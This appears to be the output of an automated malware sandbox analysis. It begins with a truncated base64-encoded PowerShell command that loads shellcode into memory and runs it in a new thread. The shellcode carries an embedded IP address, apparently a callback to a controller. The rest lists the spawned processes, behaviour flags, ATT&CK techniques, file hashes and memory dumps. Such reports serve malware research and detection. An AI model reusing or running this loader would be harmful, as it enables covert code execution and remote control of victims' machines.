QAzADAALAB9ADIAZAAsAH0ANgBlACwAfQA2ADEALAB9ADQAMwAsAH0AMwA0ACwAfQA2AGQALAB9ADcAMAAsAH0ANgBmACwAfQA0ADcALAB9ADQANQAsAH0AMwAxACwAfQA3ADkALAB9ADUANQAsAH0ANgBmACwAfQA2ADUALAB9ADcAMQAsAH0ANAA4ACwAfQA1AGEALAB9ADQAMQAsAH0ANQAzACwAfQA2ADcALAB9ADYAYwAsAH0AMwA3ACwAfQA3AGEALAB9ADYAZAAsAH0ANwA1ACwAfQA2AGUALAB9ADcANgAsAH0ANQAwACwAfQA1ADQALAB9ADYANwAsAH0ANQA3ACwAfQAzADgALAB9ADQAZAAsAH0ANAAyACwAfQA1ADEALAB9ADQAYQAsAH0AMwA1ACwAfQAzADcALAB9ADYAZAAsAH0ANAAxACwAfQA0ADYALAB9ADQAMQAsAH0ANQBhACwAfQA0ADMALAB9ADQAZQAsAH0ANAAyACwAfQA3ADIALAB9ADYANwAsAH0ANgAyACwAfQA2AGIALAB9ADYAZgAsAH0ANAA4ACwAfQA2ADkALAB9ADUANgAsAH0ANwA3ACwAfQA3AGEALAB9ADYAZQAsAH0AMwA2ACwAfQA2AGIALAB9ADYAYgAsAH0ANgBkACwAfQA1ADIALAB9ADMANAAsAH0ANgAyACwAfQA0AGQALAB9ADQAMQAsAH0ANgBhACwAfQA2ADEALAB9ADUANwAsAH0AMgBkACwAfQA2ADgALAB9ADMAMQAsAH0ANAA5ACwAfQAzADYALAB9ADcAYQAsAH0AMwA1ACwAfQA1ADMALAB9ADYAMwAsAH0ANABiACwAfQA1ADYALAB9ADYAZAAsAH0ANwBhACwAfQAyAGQALAB9ADcAMwAsAH0AMAAwACwAfQA1ADAALAB9ADYAOAAsAH0ANQA3ACwAfQA4ADkALAB9ADkAZgAsAH0AYwA2ACwAfQBmAGYALAB9AGQANQAsAH0AOAA5ACwAfQBjADYALAB9ADUAMwAsAH0ANgA4ACwAfQAwADAALAB9ADMAMgAsAH0AZQA4ACwAfQA4ADQALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9ADUANwAsAH0ANQAzACwAfQA1ADYALAB9ADYAOAAsAH0AZQBiACwAfQA1ADUALAB9ADIAZQAsAH0AMwBiACwAfQBmAGYALAB9AGQANQAsAH0AOQA2ACwAfQA2AGEALAB9ADAAYQAsAH0ANQBmACwAfQA2ADgALAB9ADgAMAAsAH0AMwAzACwAfQAwADAALAB9ADAAMAAsAH0AOAA5ACwAfQBlADAALAB9ADYAYQAsAH0AMAA0ACwAfQA1ADAALAB9ADYAYQAsAH0AMQBmACwAfQA1ADYALAB9ADYAOAAsAH0ANwA1ACwAfQA0ADYALAB9ADkAZQAsAH0AOAA2ACwAfQBmAGYALAB9AGQANQAsAH0ANQAzACwAfQA1ADMALAB9ADUAMwAsAH0ANQAzACwAfQA1ADYALAB9ADYAOAAsAH0AMgBkACwAfQAwADYALAB9ADEAOAAsAH0ANwBiACwAfQBmAGYALAB9AGQANQAsAH0AOAA1ACwAfQBjADAALAB9ADcANQAsAH0AMQA0ACwAfQA2ADgALAB9ADgAOAAsAH0AMQAzACwAfQAwADAALAB9ADAAMAAsAH0ANgA4ACwAfQA0ADQALAB9AGYAMAAsAH0AMwA1ACwAfQBlADAALAB9AGYAZgAsAH0AZAA1ACwAfQA0AGYALAB9ADcANQAsAH0AYwBkACwAfQBlADgALAB9ADQAYQAsAH0AMAAwACwAfQAwADAALAB9ADAAMAAsAH0ANgBhACwAfQA0ADAALAB9ADYAOAAsAH0AMAAwACwAfQAxADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADgALAB9ADAAMAAsAH0AMAAwACwAfQA0ADAALAB9ADAAMAAsAH0ANQAzACwAfQA2ADgALAB9ADUAOAAsAH0AYQA0ACwAfQA1ADMALAB9AGUANQAsAH0AZgBmACwAfQBkADUALAB9ADkAMwAsAH0ANQAzACwAfQA1ADMALAB9ADgAOQAsAH0AZQA3ACwAfQA1ADcALAB9ADYAOAAsAH0AMAAwACwAfQAyADAALAB9ADAAMAAsAH0AMAAwACwAfQA1ADMALAB9ADUANgAsAH0ANgA4ACwAfQAxADIALAB9ADkANgAsAH0AOAA5ACwAfQBlADIALAB9AGYAZgAsAH0AZAA1ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA0ACwAfQBjAGYALAB9ADgAYgAsAH0AMAA3ACwAfQAwADEALAB9AGMAMwAsAH0AOAA1ACwAfQBjADAALAB9ADcANQAsAH0AZQA1ACwAfQA1ADgALAB9AGMAMwAsAH0ANQBmACwAfQBlADgALAB9ADYAYgAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0AMwAxACwAfQAzADkALAB9ADMAMgAsAH0AMgBlACwAfQAzADEALAB9ADMANgAsAH0AMwA4ACwAfQAyAGUALAB9ADMAMQAsAH0AMgBlACwAfQAzADEALAB9ADMAMAAsAH0AMwA1ACwAfQAwADAALAB9AGIAYgAsAH0AZgAwACwAfQBiADUALAB9AGEAMgAsAH0ANQA2ACwAfQA2AGEALAB9ADAAMAAsAH0ANQAzACwAfQBmAGYALAB9AGQANQAiADsAJAB0AFoAPQBBAGQAZAAtAFQAeQBwAGUAIAAtAHAAYQBzAHMAIAAtAG0AIAAkAEIAbwAgAC0ATgBhAG0AZQAgACIAWABEACIAIAAtAG4AYQBtAGUAcwAgAGgAVQBCADsAJAB0AFoAPQAkAHQAWgAuAHIAZQBwAGwAYQBjAGUAKAAiAGgAVQBCACIALAAgACIAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACIAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAE4ARwAgAD0AIAAkAE4ARwAuAHIAZQBwAGwAYQBjAGUAKAAiAH0AIgAsACIATABqAGgAUAB4ACIAKQAuAHIAZQBwAGwAYQBjAGUAKAAiAEwAagBoAFAAIgAsACAAIgAwACIAKQAuAFMAcABsAGkAdAAoACIALAAiACkAOwAkAEsASwA9ADAAeAAxADAAMAA3ADsAaQBmACAAKAAkAE4ARwAuAEwAIAAtAGcAdAAgADAAeAAxADAAMAA3ACkAewAkAEsASwA9ACQATgBHAC4ATAB9ADsAJABNAEYAPQAkAHQAWgA6ADoAYwBhAGwAbABvAGMAKAAwAHgAMQAwADAANwAsACAAMQApADsAWwBVAEkAbgB0ADYANABdACQAYgBZAEYAIAA9ACAAMAA7AGYAbwByACgAJABSAFcAPQAwADsAJABSAFcAIAAtAGwAZQAoACQATgBHAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAFIAVwArACsAKQB7ACQAdABaADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQATQBGAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAFIAVwApACwAIAAkAE4ARwBbACQAUgBXAF0ALAAgADEAKQB9ADsAJAB0AFoAOgA6AFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAoACQATQBGACwAIAAwAHgAMQAwADAANwAsACAAMAB4ADQAMAAsACAAWwBSAGUAZgBdACQAYgBZAEYAKQA7ACQAdwBNAEMAPQBbAGkAbgB0AF0AMAB4ADAAMAA7ACQAdABaADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAFsAdQBpAG4AdAAzADIAXQBbAGkAbgB0AF0AMAAsACQAdwBNAEMALAAkAE0ARgAsADAALAAwACwAMAApADsA
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4580

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\icvendz1\icvendz1.cmdline"
6⤵
- Suspicious use of WriteProcessMemory
PID:624

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD007.tmp" "c:\Users\Admin\AppData\Local\Temp\icvendz1\CSC7DCA70103D664DD684AB67D37CE868F9.TMP"
7⤵
PID:4524

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
291B

MD5
5db9f21c46bccbf816753d08dbcf3484

SHA1
9aa8a0622784506dd837aef685ae5490561457f6

SHA256
147a0fe411c9a71a4eb1a8109df40e96dba83155e08106dba2fb8f7a09144939

SHA512
21ac902082d3c2b247ddb83741fa7d68e5522eed5d019496c0696cd29698f75692186a726e1029d3dfdbbaacd8699ae056e1281310c943a6d6b291d454e2e395

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b6b62fabc50bfae977635bcebb14c566

SHA1
653628f0db5229d9136ee897e92bedba3b1d91aa

SHA256
bd5e81d2c243ab6465ad978a5124f723b6518c08d63e4ebb386a564ebf3384be

SHA512
9bbbbdd9b0571e55065751e2100b21685ef630641bedf53e6a1c8b3ec96606c378ec53d732500e7dc17ae6e3a1b4d37f2fdbec8e493f6bdf10e4b829dad5962f

Download Submit
C:\Users\Admin\AppData\Local\Temp\6F0A.tmp\6F0B.tmp\6F1C.bat

Filesize
11KB

MD5
51182e5b42c828b53a6d284455715d4e

SHA1
e91c35fc43d1c9c3bb030ed4e6fc8939deb6b98c

SHA256
f7795ae81ee14c9e0c54492685bb871a711945c9023844441307244c75cc051d

SHA512
78d5219e73c96427fcb3e2372662b00cb927c6b15f2bfa96cfb12dd53b26ad2210cc3af8f96d5523b752527ecaae0e19be55f110367da21eb4a0b93b6dfced14

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES7E5C.tmp

Filesize
1KB

MD5
0bcb475b86838ec664540f39f7d3fbf8

SHA1
2dc8836084c4825687d330ba885302813fb223f8

SHA256
81a68fc882ea0fcbc52dbe7e3122ccefff02427fbe86fcbd152ae3b91d2a9e5d

SHA512
c5988ae234e789b77f4e257942ba1e04569d25fc514b23d66df64b584f0cd7f13dfdf583dd5a1564f7ae139dd72985fc21207d42386e645239b9e492effa3280

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESD007.tmp

Filesize
1KB

MD5
10d5b6edbb3632876ada865bb02dd047

SHA1
f22eef5897373c397e4493fd64b29c69bab490f9

SHA256
a0b486cc621d57f6604a722ad02b6296f1a02d6c2dd07787e7e9e0b710d422d9

SHA512
0f94ca76af5bcd1fa794411b440f6e1d0e564d76969133190dc6da1f0703c7b9aa6180be74e7963b2b928e0d1d4e06fdf6cfb9778da12239ed5b53cf502f6eca

Download Submit
C:\Users\Admin\AppData\Local\Temp\icvendz1\icvendz1.dll

Filesize
3KB

MD5
f18d7f71fa804301c3530b87e77c7f24

SHA1
f050ea46e8a023dae5da992482481c4db8ccc7f2

SHA256
e308957d40258c84fd2ac3800cc5b994e39590568d7b359578cf47039cb776ef

SHA512
f7f970639d81aa247d336f681e25c83a6dafab1be417c1e8dffb38aa38886d3239817286aac59e0c5bb253c6f14da0666ac8fa804d2e5ea54d1ac70631cfb86e

Download Submit
C:\Users\Admin\AppData\Local\Temp\n3say3sa\n3say3sa.dll

Filesize
3KB

MD5
d05207c132a123ea204a8f8b06591d9e

SHA1
63bd39d649cb5b0dc63a3d70c0559b45b52ef358

SHA256
3dd35b0f775ef8d53f0648cac2a01ee08b83b0fa843ab9f0d95d1b99531e348f

SHA512
174c8e2ffbffde2165975f222696e198c10daec05dab3504a1b15539c9f1737c97a052ba700def787a075528bd7bb1637ce387a9f9d47f12401073a2fc24a239

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\icvendz1\CSC7DCA70103D664DD684AB67D37CE868F9.TMP

Filesize
652B

MD5
68df87e5e781231ba8b7514d28a6010b

SHA1
4e155e6e18f03ab51af2a68f262933656e96a307

SHA256
e52c6bdb646fd52c87e297a6d23a31a822e963146baabaddfb329b291fd3c5b6

SHA512
d4094ab67e3bd500f7c83e40e1d0a55cbce3efdc1b4efef576ac284541c1a2c0a7d490833568e6d47a035fd8f773d2f708f09b8e9d1c8a656cfec387baad0299

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\icvendz1\icvendz1.0.cs

Filesize
656B

MD5
b82db5735fd75060d43d65c9d95d6ab3

SHA1
95cba4b3e1dc2f24ce8f049813ee285eb4a29901

SHA256
04b7d5ad1b9b7119d47dc2eedb7f5b047481e9ec89c8834f3237ecb056d31302

SHA512
c191aa7f4be4cfddb395068889ff21a4543bd9651bbf1fa965ef01f4671f864b119731461537bcec57866fd7a7b0618dc95d835bc7c73177a0f49501f3b63541

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\icvendz1\icvendz1.cmdline

Filesize
369B

MD5
7ae7dd2a2bdcc9806a8f91515fe5b85e

SHA1
526cec7ab9fd010135a5e3ba23603c3e5f0339ab

SHA256
1dd77b3b882cae2540eb50bc0661c0c958030849ee0793adddd37e1d0489301c

SHA512
6a4420d9cbca10a3f133146dfe6d343830e49006b56349793bb653358e460cc0a04d8ba3ccf8c96a5ab5698ca4772345ef5d42e5a4915a80baa405ac3b2bb202

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\n3say3sa\CSC6556FB2F163846F5A82484116148B01A.TMP

Filesize
652B

MD5
d5e178d45cee0187bdefa0a03f89b792

SHA1
661b40e7f85077e01c8e8e761a98e0cad14de4aa

SHA256
29fb4d32ea85f69b268797ef6cf5bd0f13546a37807ac13328a1996c5888c9c0

SHA512
b9f2be6ff7400bab68496e33b082c7e0c9749716b7d519af38bcec02b4e562403c55fd044f7c29abc55ea82d7470099d89a0113ba82a03ca43eb5e4c979495be

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\n3say3sa\n3say3sa.0.cs

Filesize
411B

MD5
043fd7ea15b1f00210879032dd7840a8

SHA1
b82cc2a3fb44c6f77aefa73f2096aa83c5d3a2dd

SHA256
5b255394f3277c82198041e92f9e2258327edf76f1588200f0481c96443a94c4

SHA512
2ee9851db62fcaedffdc6b4828c1b90e722307b1febaf24b6c5d4fdd3369e2ec8bc8732503b2021895217cd1a57f3bf41094b21e4cce27e2fbc5faa0c2e9ab70

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\n3say3sa\n3say3sa.cmdline

Filesize
369B

MD5
8e226053ef81d42094c3ef0e08ee4761

SHA1
7fd1004a6a2b1a0f89466e0b2c82c5e52853877f

SHA256
b7b8c4f55c79a0195ab9461e4599779c5f2732131d2b29d4e19952546b126d58

SHA512
37ae5e930e2c7e7c00e678386ff20f30f8baaa0881790e1e137c4118fc814a42361ac0d92bf6b99f96982f3ced96c5530fef5a8cefe7eef6db6d46cfdfe3ce7f

Download Submit
memory/624-161-0x0000000000000000-mapping.dmp

Download
memory/1580-134-0x00007FFDCE000000-0x00007FFDCEAC1000-memory.dmp

Filesize
10.8MB

Download
memory/1580-133-0x0000022AF1330000-0x0000022AF1352000-memory.dmp

Filesize
136KB

Download
memory/1580-132-0x0000000000000000-mapping.dmp

Download
memory/2704-130-0x0000000000000000-mapping.dmp

Download
memory/2952-149-0x00007FFDCE000000-0x00007FFDCEAC1000-memory.dmp

Filesize
10.8MB

Download
memory/2952-146-0x0000000000000000-mapping.dmp

Download
memory/3244-140-0x0000000000000000-mapping.dmp

Download
memory/3676-135-0x0000000000000000-mapping.dmp

Download
memory/3676-136-0x00007FFDCE000000-0x00007FFDCEAC1000-memory.dmp

Filesize
10.8MB

Download
memory/4524-164-0x0000000000000000-mapping.dmp

Download
memory/4580-160-0x00000000071C0000-0x00000000071DA000-memory.dmp

Filesize
104KB

Download
memory/4580-153-0x0000000005100000-0x0000000005728000-memory.dmp

Filesize
6.2MB

Download
memory/4580-157-0x0000000005ED0000-0x0000000005EEE000-memory.dmp

Filesize
120KB

Download
memory/4580-158-0x00000000063E0000-0x0000000006424000-memory.dmp

Filesize
272KB

Download
memory/4580-159-0x0000000007800000-0x0000000007E7A000-memory.dmp

Filesize
6.5MB

Download
memory/4580-155-0x0000000005080000-0x00000000050E6000-memory.dmp

Filesize
408KB

Download
memory/4580-154-0x0000000004FE0000-0x0000000005002000-memory.dmp

Filesize
136KB

Download
memory/4580-156-0x00000000057A0000-0x0000000005806000-memory.dmp

Filesize
408KB

Download
memory/4580-152-0x0000000002920000-0x0000000002956000-memory.dmp

Filesize
216KB

Download
memory/4580-151-0x0000000000000000-mapping.dmp

Download
memory/4580-170-0x0000000000BBC000-0x0000000000BBE000-memory.dmp

Filesize
8KB

Download
memory/4580-169-0x00000000075A0000-0x0000000007616000-memory.dmp

Filesize
472KB

Download
memory/4580-168-0x0000000000BBC000-0x0000000000BBF000-memory.dmp

Filesize
12KB

Download
memory/4920-148-0x0000000000000000-mapping.dmp

Download
memory/4920-150-0x00007FFDCE000000-0x00007FFDCEAC1000-memory.dmp

Filesize
10.8MB

Download
memory/5004-137-0x0000000000000000-mapping.dmp

Download